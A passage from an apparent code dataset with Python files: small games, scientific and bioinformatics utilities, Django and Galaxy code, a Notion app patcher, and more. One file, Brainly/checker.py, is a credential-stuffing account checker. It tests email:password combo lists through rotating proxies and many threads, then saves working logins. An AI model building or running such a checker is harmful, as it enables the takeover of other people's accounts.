input().lower().startswith('y')\r\n\t\r\n\r\n\r\n\r\n\r\n\r\nprint(three_in_a_row())\r\nprint(create_board())\r\nprint(sq_is_full())\r\nprint(print_intro())\r\nprint(play_again())\r\n","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238643438","text":"# Program to calculate the sum of digits in a 3 digits number\n\nimport random\n\n#num = int(input(\"enter a 3 digits number: \"))\n#num = random.random() * 900 + 100\n#num = random.uniform(100,1000)\n#num = int(num)\nnum = random.randint(100,999)\nx1 = num//100\nx2 = (num//10)%10\nx3 = num %10\n\nprint (\"the sum of digits in {0} is: {1}\".format(num, x1+x2+x3))","sub_path":"Shimon_Labs/sumOfDigits.py","file_name":"sumOfDigits.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"180253093","text":"import pygame, sys, random\nfrom pygame.locals import *\npygame.init()\npygame.display.set_caption('Meteor Strike')\n\nclass Variables(object):\n black = (0, 0, 0)\n blue = (0, 0, 255)\n red = (255, 0, 0)\n orange = (255, 150, 0)\n green = (0, 128, 0)\n white = (255, 255, 255)\n fps = 30\n mousex = 0\n mousey = 0\n mouseclicked = False\n gunx = 315\n guny = 300\n clock = pygame.time.Clock()\n direction = random.randint(1,3)\n meteorx = 0\n meteory = 0\n meteors = [False, False, False]\n meteorxstart = [25, 75, 125, 175, 225, 275, 325, 375, 425, 475, 525, 575]\n place = random.randint(0, 11)\n\n\nclass Functions(object):\n displaysurf = pygame.display.set_mode((600, 400))\n\n def drawgame(self):\n Functions.displaysurf.fill(Variables.blue)\n pygame.draw.rect(Functions.displaysurf, Variables.green, [0, 350, 600, 50])\n pygame.draw.polygon(Functions.displaysurf, Variables.red, [(275, 375),\n (315, 300), (355, 375)])\n return\n\n def firemissile(self):\n if Variables.mousey <= 350:\n radius = 1\n for x in range(10):\n pygame.draw.line(Functions.displaysurf, Variables.white, [Variables.gunx,\n Variables.guny], [Variables.mousex, Variables.mousey])\n pygame.display.update()\n Variables.clock.tick(20)\n for x in range(10):\n while radius <= 30:\n if (radius % 2) == 0:\n pygame.draw.circle(Functions.displaysurf, Variables.red,\n [Variables.mousex, Variables.mousey], radius)\n pygame.display.update()\n else:\n pygame.draw.circle(Functions.displaysurf, Variables.orange,\n [Variables.mousex, Variables.mousey], radius)\n pygame.display.update()\n radius += 1\n pygame.display.update()\n radius = 1\n Variables.mouseclicked = False\n return\n else:\n for x in range(500):\n Functions.displaysurf.fill(Variables.red)\n pygame.display.update()\n Variables.mouseclicked = False\n return\n\n def meteors(self):\n Variables.meteory = 0\n Variables.meteorx = Variables.meteorxstart[random.randint(0, 11)]\n direction = random.randint(1,3)\n while 0 <= Variables.meteorx <= 600:\n pygame.draw.rect(Functions.displaysurf, Variables.black, [Variables.meteorx,\n Variables.meteory, 5, 5])\n if (direction % 2) == 0:\n Variables.meteorx += 1\n Variables.meteory += 3\n if Variables.meteory >= 350:\n return\n pygame.display.update()\n Variables.clock.tick(25)\n self.drawgame()\n pygame.display.update()\n else:\n Variables.meteorx -= 1\n Variables.meteory += 3\n if Variables.meteory >= 350:\n return\n pygame.display.update()\n Variables.clock.tick(25)\n self.drawgame()\n pygame.display.update()\n\n\n\n\n def mainloop(self):\n while 1:\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n sys.exit()\n if event.type == MOUSEBUTTONUP:\n Variables.mousex, Variables.mousey = event.pos\n Variables.mouseclicked = True\n\n self.drawgame()\n pygame.display.update()\n self.meteors()\n if Variables.mouseclicked == True:\n self.firemissile()\n\n\ngame = Functions()\n\ngame.mainloop()\n","sub_path":"MS.py","file_name":"MS.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"501688994","text":"import numpy as np\nimport pandas as pd\n\nimport atom3d.protein.scop as scop\nimport atom3d.util.file as fi\n\n\ndef form_scop_filter(level, allowed=None, excluded=None):\n \"\"\"\n Filter by SCOP classification at a specified level.\n\n Valid levels are type, class, fold, superfamily, family.\n \"\"\"\n if allowed is None:\n allowed = []\n if excluded is None:\n excluded = []\n scop_index = scop.get_scop_index()\n scop_index = scop_index[level]\n\n # Build quick lookup tables.\n if allowed:\n permitted = pd.Series(\n {pdb_code: x.drop_duplicates().isin(allowed).any()\n for pdb_code, x in scop_index.groupby('pdb_code')})\n if excluded:\n forbidden = pd.Series(\n {pdb_code: x.drop_duplicates().isin(excluded).any()\n for pdb_code, x in scop_index.groupby('pdb_code')})\n\n def filter_fn(df):\n pdb_codes = df['structure'].apply(lambda x: x[:4].lower())\n\n if len(allowed) > 0:\n to_keep = permitted[pdb_codes]\n # If didn't find, be conservative and do not use.\n to_keep[to_keep.isna()] = False\n to_keep = to_keep.astype(bool)\n elif len(excluded) > 0:\n to_exclude = forbidden[pdb_codes]\n # If didn't find, be conservative and do not use.\n to_exclude[to_exclude.isna()] = True\n to_exclude = to_exclude.astype(bool)\n to_keep = ~to_exclude\n else:\n to_keep = pd.Series([True] * len(df), index=df['structure'])\n return df[to_keep.values]\n return filter_fn\n\n\ndef form_scop_filter_against(sharded, level, conservative):\n \"\"\"\n Remove structures with matching scop class to a chain in sharded.\n\n We consider each chain in each structure separately, and remove the\n structure if any of them matches any chain in sharded.\n\n This is done at the specified scop level, which can be one of type, class,\n fold, superfamily, or family.\n\n Conservative indicates what we should do about pdbs that do not have any\n scop class associated with them. True means we throw out, False means we\n keep.\n \"\"\"\n scop_index = scop.get_scop_index()[level]\n\n def form_scop_against():\n result = []\n for shard in sharded.iter_shards():\n for (e, su, st), structure in shard.groupby(\n ['ensemble', 'subunit', 'structure']):\n pc = fi.get_pdb_code(st).lower()\n for (m, c), _ in structure.groupby(['model', 'chain']):\n if (pc, c) in scop_index:\n result.append(scop_index.loc[(pc, c)].values)\n return np.unique(np.concatenate(result))\n scop_against = form_scop_against()\n\n def filter_fn(df):\n to_keep = {}\n for (e, su, st), structure in df.groupby(\n ['ensemble', 'subunit', 'structure']):\n pc = fi.get_pdb_code(st).lower()\n for (m, c), _ in structure.groupby(['model', 'chain']):\n if (pc, c) in scop_index:\n scop_found = scop_index.loc[(pc, c)].values\n if np.isin(scop_found, scop_against).any():\n to_keep[(st, m, c)] = False\n else:\n to_keep[(st, m, c)] = True\n else:\n to_keep[(st, m, c)] = not conservative\n to_keep = \\\n pd.Series(to_keep)[pd.Index(df[['structure', 'model', 'chain']])]\n return df[to_keep.values]\n return filter_fn","sub_path":"atom3d/filters/scop.py","file_name":"scop.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"44004137","text":"def get_indices_of_item_weights(weights, length, limit):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n \n dictonary = {}\n\n for i in range(length):\n weight = weights[i]\n dictonary[weight]= i\n\n for x in range(length):\n key = limit - weights[x]\n if key in dictonary:\n return(dictonary[key],x)\n\n\n # Your code here\n\n # return None\n","sub_path":"hashtables/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523697864","text":"\n# Notion Enhancer\n# (c) 2020 dragonwocky \n# (c) 2020 TarasokUA\n# (https://dragonwocky.me/) under the MIT license\n\nimport re\nimport os\nimport sys\nimport platform\nimport subprocess\nfrom shutil import copyfile\nfrom time import sleep\n\n# for toggling notion visibility\nhotkey = 'CmdOrCtrl+Shift+A'\n\n# f'{bold}=== title ==={normal}' = headers\n# '*' = information\n# '...' = actions\n# '##' = warnings\n# '>' = exit\n\nbold = '\\033[1m'\nnormal = '\\033[0m'\n\nprint(f'{bold}=== NOTION ENHANCER CUSTOMISATION LOG ==={normal}\\n')\n\ntry:\n filepath = ''\n __folder__ = os.path.dirname(os.path.realpath(__file__)).replace('\\\\', '/')\n if 'microsoft' in platform.uname()[3].lower() and sys.platform == 'linux':\n filepath = '/mnt/c/' + \\\n subprocess.run(\n ['cmd.exe', '/c', 'echo', '%localappdata%'], stdout=subprocess.PIPE).stdout \\\n .rstrip().decode('utf-8')[3:].replace('\\\\', '/') + '/Programs/Notion/resources'\n drive = __folder__[5].capitalize() if __folder__.startswith(\n '/mnt/') else 'C'\n __folder__ = drive + ':/' + __folder__[6:]\n elif sys.platform == 'win32':\n filepath = subprocess.run(['echo', '%localappdata%'], shell=True, capture_output=True).stdout \\\n .rstrip().decode('utf-8').replace('\\\\', '/') + '/Programs/Notion/resources'\n else:\n print(' > script not compatible with your os!\\n (report this to dragonwocky#8449 on discord)')\n exit()\n\n if os.path.isfile(filepath + '/app.asar'):\n print(' ...unpacking app.asar')\n subprocess.run(['asar', 'extract', filepath +\n '/app.asar', filepath + '/app'], shell=(True if sys.platform == 'win32' else False))\n print(' ...renaming asar.app to asar.app.bak')\n os.rename(filepath + '/app.asar', filepath + '/app.asar.bak')\n else:\n print(f' ## file {filepath}/app.asar not found!')\n print(' * attempting to locate')\n if os.path.exists(filepath + '/app'):\n print(' * app.asar was already unpacked: step skipped.')\n else:\n print(' > nothing found: exiting.')\n exit()\n\n if os.path.isfile(filepath + '/app/renderer/preload.js'):\n print(f' ...adding preload.js to {filepath}/app/renderer/preload.js')\n with open(filepath + '/app/renderer/preload.js', 'r', encoding='UTF-8') as content:\n if '/* === INJECTION MARKER === */' in content.read():\n print(' * preload.js already added. replacing it.')\n content.seek(0)\n original = []\n for num, line in enumerate(content):\n if '/* === INJECTION MARKER === */' in line:\n break\n original += line\n with open(filepath + '/app/renderer/preload.js', 'w', encoding='UTF-8') as write:\n write.writelines(original)\n else:\n with open(filepath + '/app/renderer/preload.js', 'a', encoding='UTF-8') as append:\n append.write('\\n\\n')\n with open(filepath + '/app/renderer/preload.js', 'a', encoding='UTF-8') as append:\n print(' ...linking to ./resources/user.css')\n with open('./resources/preload.js', 'r', encoding='UTF-8') as insert:\n append.write(insert.read().replace(\n '___user.css___', __folder__\n + '/resources/user.css'))\n else:\n print(\n f' * {filepath}/app/renderer/preload.js was not found: step skipped.')\n\n if os.path.isfile(filepath + '/app/main/createWindow.js'):\n with open(filepath + '/app/main/createWindow.js', 'r', encoding='UTF-8') as content:\n content = content.read()\n print(\n f' ...making window frameless @ {filepath}/app/main/createWindow.js')\n if '{ frame: false, show: false' not in content:\n content = content.replace(\n '{ show: false', '{ frame: false, show: false')\n print(\n f' ...adding \"open hidden\" capabilities to {filepath}/app/main/createWindow.js')\n content = re.sub('\\\\s*\\\\/\\\\* === INJECTION START === \\\\*\\\\/.*?\\\\/\\\\* === INJECTION END === \\\\*\\\\/\\\\s*',\n 'window.show()', content, flags=re.DOTALL).replace('window.show()', \"\"\"\n /* === INJECTION START === */\n const path = require('path'),\n store = new (require(path.join(__dirname, '..', 'store.js')))({\n config: 'user-preferences',\n defaults: {\n openhidden: false,\n maximised: false\n }\n });\n if (!store.get('openhidden') || electron_1.BrowserWindow.getAllWindows().some(win => win.isVisible()))\n { window.show(); if (store.get('maximised')) window.maximize(); }\n /* === INJECTION END === */\n \"\"\")\n with open(filepath + '/app/main/createWindow.js', 'w', encoding='UTF-8') as write:\n write.write(content)\n else:\n print(\n f' * {filepath}/app/main/createWindow.js was not found: step skipped.')\n\n if os.path.isfile(filepath + '/app/renderer/index.js'):\n with open(filepath + '/app/renderer/index.js', 'r', encoding='UTF-8') as content:\n print(\n f' ...adjusting drag area for frameless window in {filepath}/app/renderer/index.js')\n content = content.read()\n top = content.rfind('top')\n content = content[:top] + content[top:].replace(\n 'right: 0', 'right: 420').replace(\n 'top: 0', 'top: 1 ').replace(\n 'height: 34', 'height: 16')\n with open(filepath + '/app/renderer/index.js', 'w', encoding='UTF-8') as write:\n write.write(content)\n else:\n print(\n f' * {filepath}/app/renderer/index.js was not found: step skipped.')\n\n if os.path.isfile(filepath + '/app/main/main.js'):\n with open(filepath + '/app/main/main.js', 'r', encoding='UTF-8') as content:\n print(\n f' ...adding tray support (inc. context menu with settings) to {filepath}/app/main/main.js')\n print(\n f' ...adding window toggle hotkey to {filepath}/app/main/main.js')\n content = content.read()\n with open(filepath + '/app/main/main.js', 'w', encoding='UTF-8') as write:\n if '/* === INJECTION MARKER === */' in content:\n print(' * hotkey.js already added. replacing it.')\n original = []\n for line in content.splitlines():\n if '/* === INJECTION MARKER === */' in line:\n break\n original.append(line)\n write.write('\\n'.join(original))\n else:\n write.write(content.replace(\n 'electron_1.app.on(\"ready\", handleReady);',\n 'electron_1.app.on(\"ready\", () => handleReady() && enhancements());') + '\\n')\n with open(filepath + '/app/main/main.js', 'a', encoding='UTF-8') as append:\n with open('./resources/hotkey.js', 'r', encoding='UTF-8') as insert:\n append.write('\\n' + insert.read().replace(\n '___hotkey___', hotkey))\n print(\n f' ...copying tray icon ./resources/notion.ico to {filepath}/app/main/')\n copyfile('./resources/notion.ico',\n filepath + '/app/main/notion.ico')\n print(\n f' ...copying datastore wrapper ./resources/store.js to {filepath}/app/')\n copyfile('./resources/store.js', filepath + '/app/store.js')\n else:\n print(\n f' * {filepath}/app/main/main.js was not found: step skipped.')\n\n print(f'\\n{bold}>>> SUCCESSFULLY CUSTOMISED <<<{normal}')\n\nexcept Exception as e:\n print(f'\\n{bold}### ERROR ###{normal}\\n{str(e)}')\n\nprint(f'\\n{bold}=== END OF LOG ==={normal}')\n","sub_path":"customiser.py","file_name":"customiser.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"323551781","text":"import logging, brainly_api, itertools\n\ninfo = 'Checker by _Skill_'\nlogging.basicConfig(level=logging.INFO)\n\n\n\nclass Checker(object):\n def __init__(self):\n import datetime\n self.io = 0\n self.proxies = []\n self.acc_array = []\n self.date = datetime.datetime.now().strftime(\"%d%m%Y-%H%M%S\")\n try:\n self.filename = open('./results/BRAINLY-{}.txt'.format(self.date), 'a')\n except FileNotFoundError:\n os.mkdir('results')\n self.filename = open('./results/BRAINLY-{}.txt'.format(self.date), 'a')\n\n def load_proxies(self, proxies_path, p_type):\n if p_type == 'http/s' or p_type == '1':\n file = open(proxies_path, 'r').readlines()\n file = [pr.rstrip() for pr in file]\n for lines in file:\n data = lines.replace('\\n', '')\n self.proxies.append({'proxy':{'http': 'http://'+data,\n 'https': 'http://'+data}})\n \n elif p_type == 'socks4' or p_type == '2':\n file = open(proxies_path, 'r').readlines()\n file = [pr.rstrip() for pr in file]\n for lines in file:\n data = lines.replace('\\n', '')\n self.proxies.append({'proxy':{'http': 'socks4://'+data,\n 'https':'socks4://'+data}})\n \n elif p_type == 'socks5' or p_type == '3':\n file = open(proxies_path, 'r').readlines()\n file = [pr.rstrip() for pr in file]\n for lines in file:\n data = lines.replace('\\n', '')\n self.proxies.append({'proxy':{'http': 'socks5://'+data,\n 'https': 'socks5://'+data}})\n \n else: self.proxies.append({'proxy':None})\n\n def load(self, base_path):\n file = open(base_path, 'r', encoding='latin-1').readlines()\n file = [combos.rstrip() for combos in file]\n for lines in file:\n data = lines.replace('\\n', '').split(':')\n try:\n data[1] += ''\n except IndexError:\n data.append('1')\n self.acc_array.append({'em': data[0],\n 'pw': data[1]})\n\n def write_info(self, info):\n logging.info('Новый аккаунт')\n self.filename.write(info)\n self.filename.flush()\n\n\n def login(self, acc, pr):\n email = acc['em']\n password = acc['pw']\n proxy = pr['proxy']\n result = brainly_api.check(email, password, proxy)\n if result != None:\n self.write_info(result)\n\n\n def main(self, threads):\n from multiprocessing.dummy import Pool\n self.load(base_path)\n self.load_proxies(proxies_path, p_type)\n self.threads = threads\n pool = Pool(self.threads)\n pool.starmap(self.login, zip(self.acc_array, itertools.cycle(self.proxies)))\n #for _ in pool.imap_unordered(self.login, self.acc_array):\n # pass\n\n\n\nif __name__ == '__main__':\n import time, os\n logging.info(info)\n while True:\n try:\n path = input('Выберите базу --> ')\n proxies_path = input('Выберите прокси --> ')\n p_type = input('Тип прокси(http/s, socks4, socks5) --> ')\n threads = int(input('Количество потоков --> '))\n base_path = os.path.abspath(r''.join(path.replace('\"', '').strip())).replace('\\\\', '/')\n proxies_path = os.path.abspath(r''.join(proxies_path.replace('\"', '').strip())).replace('\\\\', '/')\n start = time.time()\n Checker().main(threads)\n logging.info('Закончено за {} сек.\\n--------------------'.format(str(round(time.time() - start, 2))))\n except KeyboardInterrupt:\n logging.info('Остановлено')\n os._exit(1)\n #except:\n # logging.error('Что-то пошло не так')\n","sub_path":"Brainly/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"254518595","text":"\"\"\"\nMigration script to allow invalidation of job external output metadata temp files\n\"\"\"\nfrom __future__ import print_function\n\nimport logging\n\nfrom sqlalchemy import Boolean, Column, MetaData\n\nfrom galaxy.model.migrate.versions.util import add_column, drop_column\n\nlog = logging.getLogger(__name__)\nmetadata = MetaData()\n\n\ndef upgrade(migrate_engine):\n metadata.bind = migrate_engine\n print(__doc__)\n metadata.reflect()\n\n isvalid_column = Column(\"is_valid\", Boolean, default=True)\n add_column(isvalid_column, \"job_external_output_metadata\", metadata)\n\n\ndef downgrade(migrate_engine):\n metadata.bind = migrate_engine\n metadata.reflect()\n # SQLAlchemy Migrate has a bug when dropping a boolean column in SQLite\n if migrate_engine.name != 'sqlite':\n drop_column(\"is_valid\", \"job_external_output_metadata\", metadata)\n","sub_path":"lib/galaxy/model/migrate/versions/0129_job_external_output_metadata_validity.py","file_name":"0129_job_external_output_metadata_validity.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"637364390","text":"from django.shortcuts import render,redirect,get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom .cart import Cart\nfrom .forms import CartAddProductForm\nfrom shop.models import Product\n# Create your views here.\n\n\n@require_POST\ndef cart_add(request,product_id):\n cart=Cart(request)\n product=get_object_or_404(Product,id=product_id)\n product_form=CartAddProductForm(request.POST)\n if product_form.is_valid():\n cd=product_form.cleaned_data\n cart.add(product=product,\n quantity=cd['quantity'],\n update_quantity=cd['update'])\n if not cd['update']:\n return redirect('shop:product_list')\n return redirect('cart:cart_detail')\n\ndef cart_remove(request,product_id):\n cart=Cart(request)\n product=get_object_or_404(Product,id=product_id)\n cart.remove(product)\n return redirect('cart:cart_detail')\n\n\ndef cart_detail(request):\n cart=Cart(request)\n dicty={'name':\"yasser\"}\n for item in cart:\n item['update_quantity_form']=CartAddProductForm(\n initial={'quantity':item['quantity'],\n 'update':True}\n )\n return render(request,\n 'cart/cart_detail.html',\n {'cart':cart,'vi':dicty}\n )\n","sub_path":"gelectronics/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"438410686","text":"import outlineTestPen\nreload(outlineTestPen)\nfrom outlineTestPen import OutlineTestPen\n\noptions = {\n \"extremum_calculate_badness\": True,\n \"extremum_ignore_badness_below\": 2,\n \"smooth_connection_max_distance\": 4,\n \"fractional_ignore_point_zero\": True,\n \"collinear_vectors_max_distance\": 2,\n}\n\ndef run_test(font, glyphnames):\n for n in glyphnames:\n g = font[n]\n otp = OutlineTestPen(CurrentFont(), options)\n g.draw(otp)\n if otp.errors:\n if len(otp.errors) > 0:\n g.mark = (1, 0.65, 0.6, 1)\n #for e in otp.errors:\n # print e\n\nfont = CurrentFont()\nglyphnames = CurrentFont().keys()\nrun_test(font, glyphnames)\n","sub_path":"RedArrow.roboFontExt/lib/Mark glyphs with errors.py","file_name":"Mark glyphs with errors.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"627887813","text":"'''\r\nCreator :Krishnendu Maji\r\n progam to verfify the CMB data with theory\r\n'''\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef irradiance(f): #this fucntion calculates the Spectral Iiradiance of a Blackbody at 2.725K\r\n\th = 6.626 * 10**-34.0 #units Js\r\n\tc = 3.0*10**8.0 # units ms^-1\r\n\tkB = 1.38064852 * 10**-23.0 # S.I units\r\n\tT = 2.725\r\n\r\n\tvalue = (2.0*h*c*f**3.0)/((np.exp((h*c*f)/(kB*T))-1.0))*10**20 # unit MJy/sr\r\n\treturn value\r\n'''\r\nThis sections creates data poins for plotting Blackbody radiation of a Blackbody at 2.725K\r\n'''\r\nwavenumber = np.arange(2.20,22.20,0.01) # units cm^-1\r\nplt.xlabel(\"Wave Number 1/λ (in $cm^-$)\")\r\nplt.ylabel(\"Intenity B$_λ$ (in MJy/sr)\")\r\nI = irradiance(100*wavenumber)\r\n#here I have found the wave number corresponding to the maximum irradiance#\r\nmaxvalue = \"The peak value at (wave number) \"+str(wavenumber[np.where(I == np.amax(I))[0]])\r\nprint(maxvalue)\r\n\r\n\r\n'''\r\nThis section plots the data from NASA\r\n'''\r\n\r\nwavenumber_data = np.loadtxt(\"C:/Users/user/Desktop/nasa_data.txt\",dtype = 'float',comments = '#',delimiter = None,usecols = (0))\r\nIrradiance_data = np.loadtxt(\"C:/Users/user/Desktop/nasa_data.txt\",dtype = 'float',comments = '#',delimiter = None,usecols = (1))\r\n\r\nplt.scatter(wavenumber_data , Irradiance_data, color = 'red', label='NASA Data', s = 12.0)\r\nplt.plot(wavenumber, irradiance(100.0*wavenumber),label='Planck\\'s Law at T = 2.725K', color = 'green')\r\nplt.legend(loc = 'upper right', frameon = True, shadow = True)\r\nplt.title(\"Comparing CMB background flux with Blackbody of temperature 2.725K\")\r\nplt.text(12.5,200,maxvalue)\r\nplt.grid(True)\r\nplt.show()\r\n#So, from the graph we see that the maximum of the graph occurs for the wavenumber 5.34 cm-1. So the corresponding wavelength is 0.1872 cm. This lies in the microwave region#\r\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"444908100","text":"# -*- coding: utf-8 -*-\n# \nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\ndef set_default_html(apps, schema_editor):\n plans_html = \"\"\"

Welcome to Trunk-Player

\n

Currently no plans are setup

\n \"\"\"\n\n WebHTML = apps.get_model('radio', 'WebHtml')\n index = WebHTML(name='plans', bodytext=plans_html).save()\n\ndef remove_default_html(apps, schema_editor):\n WebHTML = apps.get_model('radio', 'WebHtml')\n WebHTML.objects.filter(name='plans').delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('radio', '0036_auto_20170522_1921'),\n ]\n\n operations = [\n # Setup a default source\n migrations.RunPython(set_default_html, remove_default_html),\n ]\n","sub_path":"radio/migrations/0037_add_default_plan_html.py","file_name":"0037_add_default_plan_html.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"223664058","text":"import glob\nimport sys\nimport numpy as np\nimport pickle\nfrom shared import scenes\n\n\n\nlabels = [i.split('/')[-1] for i in glob.glob(\"../output/images/*\")]\n\nsummary = []\nfor scene in scenes:\n for label in labels:\n files = glob.glob(\"../output/images/{}/*{}*.png\".format(label,scene))\n summary.append([scene, label, len(files)])\n\n\nsummary = sorted(summary, key=lambda x:x[2])\n\n\nif sys.argv[1] == \"SET\":\n starting_dict = {}\n\n for identifier in summary:\n key = identifier[0] + identifier[1]\n print(key)\n starting_dict[key] = identifier[2]\n #print(\"{}\\t{}\\t{}\".format(*identifier))\n\n with open('.tmp','w') as F:\n pickle.dump(starting_dict, F)\n\nelse:\n with open(\".tmp\",'r') as F:\n starting_dict = pickle.load(F)\n\n for identifier in summary:\n key = identifier[0] + identifier[1]\n count = identifier[2] - starting_dict[key]\n if count > 0:\n print(\"{0:14}{1:6}{2:10}\".format(identifier[0], identifier[1], count))\n\n\n","sub_path":"processing/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56690286","text":"import os\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\nclass Player:\n def __init__(self):\n self.location = None\n self.evidences = []\n self.alive = True\n self.credibility = 100\n self.penalty = -20\n self.showCred = False\n self.skip = False\n self.coins = 0\n self.props = []\n def goDirection(self, direction):\n self.location = self.location.getDestination(direction)\n def pickup(self, evid):\n self.evidences.append(evid)\n evid.loc = self\n self.location.removeEvidence(evid)\n return evid\n def showInventory(self):\n clear()\n print('You have ' + str(self.coins) + ' coins.\\n')\n print(\"You currently have these evidences:\")\n j = 1\n for e in self.evidences:\n print(str(j)+\".\", e.name)\n j += 1\n print()\n print('You have the following props:')\n j = 1\n for p in self.props:\n print(str(j) + \". \", p.name)\n print()\n input(\"press enter to continue...\")\n def consume(self, n):\n self.props[n-1].ability(self)\n\n\nclass Shop:\n def __init__(self, player):\n self.merchandise = [CP]\n self.player = player\n def purchase(self, n):\n clear()\n merch = self.merchandise[n-1]\n if self.player.coins >= merch.COST:\n if len(self.player.props) < 10:\n print('You\\'ve just purchased ' + merch.NAME + '! Cost ' + str(merch.COST) + 'coins!')\n self.player.props.append(merch())\n self.player.coins -= merch.COST\n else:\n print('Not enough bag space.')\n else:\n print('Not enough coins')\n input('press enter to continue...')\n def shopping(self):\n shopSucceed = False\n while not shopSucceed:\n clear()\n print(\"Welcome to the Shop! Purchase anything to your advance:\")\n i = 1\n for m in self.merchandise:\n print(str(i) + '. ' + m.NAME + ' ' + '.'*(40-len(m.NAME)) + str(m.COST) + ' coins')\n i += 1\n print()\n choice = input('What do you want to buy? ')\n if choice.isnumeric():\n n = int(choice)\n if n > 0 and n <= len(self.merchandise):\n self.purchase(n)\n print('Purchase Successful!')\n else:\n print('Invalid item!')\n elif choice == 'exit':\n shopSucceed = True\n elif choice == 'help':\n self.print_help()\n else:\n print('Invalid Command!')\n def print_help(self):\n clear()\n print('input to purchase item.')\n print('input \\'exit\\' to leave the shop')\n input('press enter to continue...')\n\nclass Prop:\n def __init__(self, name, cost):\n self.name = name\n self.cost = cost\n def ability(self, p):\n print(\"This prop can't do anything!\")\n\nclass CP(Prop):\n NAME = \"Evidence in a Box\"\n COST = 10\n def __init__(self):\n Prop.__init__(self, CP.NAME, CP.COST)\n\n def ability(self, player):\n player.credibility = min(100, player.credibility + 10)\n clear()\n print(\"Credibility up 10 percent.\")\n input('press enter to continue...')\n","sub_path":"PRFinal/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617866610","text":"#!/usr/bin/env python\n# -*- coding: iso-8859-1 -*-\n__author__=\"Marco Mina\"\n__email__=\"marco.mina.85@gmail.com\"\n\nimport sys\nimport os\nfrom Parser import *\n\nclass RowParser(Parser): # rename to StringParser?\n\tsplit = False\n\tseparator_symbol = '\\t'\n\tcomment_symbol = None\n\texpected_columns = 0\n\tmax_splits = None\n\n\tdef __init__(self):\n\t\tsuper(RowParser, self).__init__()\n\t\tpass\n\n\tdef is_ok(self, line):\n\t\tif line == '':\n\t\t\treturn False\n\t\tif not self.comment_symbol == None and line[0] == self.comment_symbol:\n\t\t\treturn False\n\t\treturn True\n\n\tdef process_line(self, line):\n\t\tif self.split:\n\t\t\tif self.max_splits == None:\n\t\t\t\tline = line.split(self.separator_symbol)\n\t\t\telse:\n\t\t\t\tline = line.split(self.separator_symbol, self.max_splits)\n\t\t\tif len(line) < self.expected_columns:\n\t\t\t\treturn\n\t\t\tself.output_data = line\n\t\telse:\n\t\t\tself.output_data = line\n\t\treturn\n\n\tdef finalize_output(self):\n\t\tpass\n\t\n\tdef initialize_output(self):\n\t\tself.output_data = None\n\n\tdef parse(self):\n\t\tself.initialize_output()\n\t\t#print \"This \" + self.input_data\n\t\tif self.input_data == None:\n\t\t\treturn\n\t\tif not type(self.input_data) == str:\n\t\t\treturn\n\t\tline = self.input_data.rstrip('\\n')\n\t\tline = line.rstrip('\\r')\n\t\tif not self.is_ok(line):\n\t\t\t#print \"Not ok\"\n\t\t\treturn\n\t\t#print \"ok\" + line\n\t\tself.process_line(line)\n\t\tself.finalize_output()\n","sub_path":"align/local_alignment/bin/pyAlignmentGraph-1.2/src/parser/RowParser.py","file_name":"RowParser.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"19848277","text":"#!/usr/bin/env python3\n# =============================================================================\n#\n# PUBLIC DOMAIN NOTICE\n# National Center for Biotechnology Information\n#\n# This software/database is a \"United States Government Work\" under the\n# terms of the United States Copyright Act. It was written as part of\n# the author's official duties as a United States Government employee and\n# thus cannot be copyrighted. This software/database is freely available\n# to the public for use. The National Library of Medicine and the U.S.\n# Government have not placed any restriction on its use or reproduction.\n#\n# Although all reasonable efforts have been taken to ensure the accuracy\n# and reliability of the software and data, the NLM and the U.S.\n# Government do not and cannot warrant the performance or results that\n# may be obtained by using this software or data. The NLM and the U.S.\n# Government disclaim all warranties, express or implied, including\n# warranties of performance, merchantability or fitness for any particular\n# purpose.\n#\n# Please cite the author in any work or product based on this material.\n#\n# =============================================================================\n\n\nimport connexion\nimport logging\nimport 